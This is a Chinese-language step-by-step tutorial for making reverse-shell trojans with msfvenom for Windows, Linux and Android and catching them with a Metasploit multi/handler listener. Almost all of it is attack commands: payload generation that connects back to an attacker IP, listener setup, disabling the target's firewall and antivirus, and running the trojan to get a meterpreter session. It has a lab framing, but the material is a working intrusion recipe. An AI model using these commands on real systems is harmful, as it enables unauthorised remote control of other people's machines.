基本思路:
- 攻击机生成木马
- 移动木马到靶机
- 攻击机开启监听
- 靶机运行木马(关闭安全软件)
- 攻击机进行操作
Windows:
- 利用msfvenom制作(在攻击机上操作)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=4444 -f exe > shell.exe
-
将木马放入同一个网段的Windows攻击机(关闭防火墙,关闭Windows defender)
-
利用msf开启监听(在攻击机上操作)
msfconsole
#开启metasploit
use exploit/multi/handler
#使用相关攻击模块
set payload windows/meterpreter/reverse_tcp
#监听方式
show options
#查看其他参数,如果没有部署LHOST,则写入下面语句
set LHOST 攻击机IP
run
#开启监听
4.运行靶机上的shell.exe
5.攻击机上会出现
meterpreter>
- 成功
Linux:
- 利用msfvenom制作(在攻击机上操作)
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=1攻击机ip LPORT=4444 -f elf >shell
-
将木马放入同一个网段的Linux攻击机(关闭防火墙)
-
利用msf开启监听(在攻击机上操作)
msfconsole
#开启metasploit
use exploit/multi/handler
#使用相关攻击模块
set payload linux/x64/meterpreter/reverse_tcp
#监听方式
show options
#查看其他参数,如果没有部署LHOST,则写入下面语句
set LHOST 攻击机IP
run
#开启监听
4.运行靶机上的shell
./shell
5.如果无法运行就赋予权限
chmod 777 shell
#在放shell的文件夹里运行,再运行
./shell
6.攻击机上会出现
meterpreter>
- 成功
Android:
- 利用msfvenom制作(在攻击机上操作)
msfvenom -p android/meterpreter/reverse_tcp lhost=攻击机ip lport=4444 R > shell.apk
-
将木马放入同一个网段的安卓模拟机
-
利用msf开启监听(在攻击机上操作)
msfconsole
#开启metasploit
use exploit/multi/handler
#使用相关攻击模块
set payload android/meterpreter/reverse_tcp
#监听方式
show options
#查看其他参数,如果没有部署LHOST,则写入下面语句
set LHOST 攻击机IP
run
#开启监听
4.点击MainActive运行靶机上的木马
5.如果无法运行就去设置赋予权限
6.攻击机上会出现
meterpreter>
- 成功
没发现这过程就是复制粘贴,改了几句话吗?